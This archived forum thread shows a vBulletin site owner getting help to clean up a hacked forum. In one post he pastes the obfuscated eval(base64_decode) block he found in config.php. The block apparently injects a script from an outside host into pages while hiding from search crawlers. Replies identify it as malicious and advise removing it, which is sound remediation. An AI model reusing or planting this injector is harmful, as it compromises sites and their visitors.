Go Back   vb.org Archive > Community Discussions > Forum and Server Management
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools Display Modes
  #1  
Old 05-07-2010, 01:07 PM
nkmsw8 nkmsw8 is offline
 
Join Date: Jul 2009
Posts: 12
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default HELP...My forum has been infected with a virus

I have been running this forum for about two years now and early this morning I was notified that I had a virus or that my forum was hacked. The website is floridaconcealedcarry.com/Forum/index.php.

I can't login to it and don't know where to start as far as correcting this. I was set to upgrade to the new 4.0 software in a few days and so this is devastating for me.

Thanks
Reply With Quote
  #2  
Old 05-07-2010, 01:24 PM
borbole's Avatar
borbole borbole is offline
 
Join Date: Jan 2010
Posts: 2,559
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by nkmsw8 View Post
I have been running this forum for about two years now and early this morning I was notified that I had a virus or that my forum was hacked. The website is *** removed life linkj ***

I can't login to it and don't know where to start as far as correcting this. I was set to upgrade to the new 4.0 software in a few days and so this is devastating for me.

Thanks
First off, I would advice anyone against clicking the link to the infected forum for security reasons.

That said, try to do a clean up of all your vb files by overwritting them with a fresh set from the vb package, your version. Then do another thorugh checkup of all your server space and database and if everything is ok upgrade to the latest version. Also change all the passwords for your admin, ftp, cp etc. And as last but not least, inform your host about this so they can check their logs and see how exactly they got in.
Reply With Quote
  #3  
Old 05-07-2010, 01:28 PM
Lynne's Avatar
Lynne Lynne is offline
 
Join Date: Sep 2004
Location: California/Idaho
Posts: 41,180
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Can you ftp to your site? If so, replace all the files with totally default files and remove any non-vbulletin files.

Have you talked to your host? They may be able to help figure out how this happened.
Reply With Quote
  #4  
Old 05-07-2010, 01:29 PM
nkmsw8 nkmsw8 is offline
 
Join Date: Jul 2009
Posts: 12
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Thanks for the advice. I will be doing these things now.

--------------- Added [DATE]1273245301[/DATE] at [TIME]1273245301[/TIME] ---------------

I have gone ahead and change my ftp password but I cannot access my CP or Admin. I will download the entire site from the server onto my computer in a secures sandbox. However, how can I save the user data from these files. My oldest backup is weeks old.

Thanks.
Reply With Quote
  #5  
Old 05-07-2010, 02:19 PM
borbole's Avatar
borbole borbole is offline
 
Join Date: Jan 2010
Posts: 2,559
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by nkmsw8 View Post
Thanks for the advice. I will be doing these things now.

--------------- Added [DATE]1273245301[/DATE] at [TIME]1273245301[/TIME] ---------------

I have gone ahead and change my ftp password but I cannot access my CP or Admin. I will download the entire site from the server onto my computer in a secures sandbox. However, how can I save the user data from these files. My oldest backup is weeks old.

Thanks.
That data is stored at the db and not in the php files. Try to clean them up as suggested above and see if it would help.
Reply With Quote
  #6  
Old 05-07-2010, 07:22 PM
nkmsw8 nkmsw8 is offline
 
Join Date: Jul 2009
Posts: 12
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Thanks for all your help. The forum is now back up and running. I re-installed all the PHP files and that took care of the problem.

Thanks
Reply With Quote
  #7  
Old 05-07-2010, 07:29 PM
borbole's Avatar
borbole borbole is offline
 
Join Date: Jan 2010
Posts: 2,559
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by nkmsw8 View Post
Thanks for all your help. The forum is now back up and running. I re-installed all the PHP files and that took care of the problem.

Thanks
Glad to hear that. Did you also upgrade to the latest version? Also don''t forget to inform your host about it so they can investigate things on their end as well.
Reply With Quote
  #8  
Old 05-07-2010, 10:58 PM
nkmsw8 nkmsw8 is offline
 
Join Date: Jul 2009
Posts: 12
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

I was digging around in my config.php file while changing the db password and I found this code at the top of the file.

Quote:
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl 9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsg ICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl 9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9l eGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgIC AgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FH RU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVk VSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAg ICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y2 1NOUltaDBkSEE2THk5cGJtUmxjMmxuYm5OMGRXUnBiMmx1Wm04 dVkyOXRMMnh6TG5Cb2NDSStQQzl6WTNKcGNIUSsiKTsgICAgIC B9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBp ZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIG Z1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIz QzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5Nk QwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5 Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7IC AgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFE OT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2Qk IwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2 QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2Qj E5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2Jyxz dWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Nj g0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZF QUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRD A3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5 MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNj ZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigk UjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpey AgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNE QUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MT FBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1 ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzME IyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAg ICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRD k9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1 NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MT I4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJB QjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgIC AkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0y OyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OU ExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNG MUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMD M3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigk UjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09Rk FMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUEx ODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQT U2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFC OTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9IC AgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVF RjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LU VuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUy OEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5Qj EyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihw cmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0 I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4g cHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJy xnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5 RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm 4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5n bWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJv"));?>
Should this be there?
Reply With Quote
  #9  
Old 05-07-2010, 11:21 PM
borbole's Avatar
borbole borbole is offline
 
Join Date: Jan 2010
Posts: 2,559
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by nkmsw8 View Post
I was digging around in my config.php file while changing the db password and I found this code at the top of the file.



Should this be there?
No, that code should be deleted. If I were you I would also check thoroughly my server space for any thing out of ordinary. it would be best if you checked all the other .php non vb files that you might have. Like for ex from another script like wordpress, etc.
Reply With Quote
  #10  
Old 05-07-2010, 11:31 PM
nkmsw8 nkmsw8 is offline
 
Join Date: Jul 2009
Posts: 12
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Will do. Thanks :up:

--------------- Added [DATE]1273286835[/DATE] at [TIME]1273286835[/TIME] ---------------

How many different places in the Vbulletin software do you have to update the db password when it's changed on the db server? I'm getting a db error after I updated the password on the db and the config.php file.
Reply With Quote
Reply


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 09:19 AM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.04382 seconds
  • Memory Usage 2,260KB
  • Queries Executed 11 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (5)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (2)pagenav_pagelink
  • (10)post_thanks_box
  • (10)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (10)post_thanks_postbit_info
  • (10)postbit
  • (10)postbit_onlinestatus
  • (10)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • pagenav_page
  • pagenav_complete
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete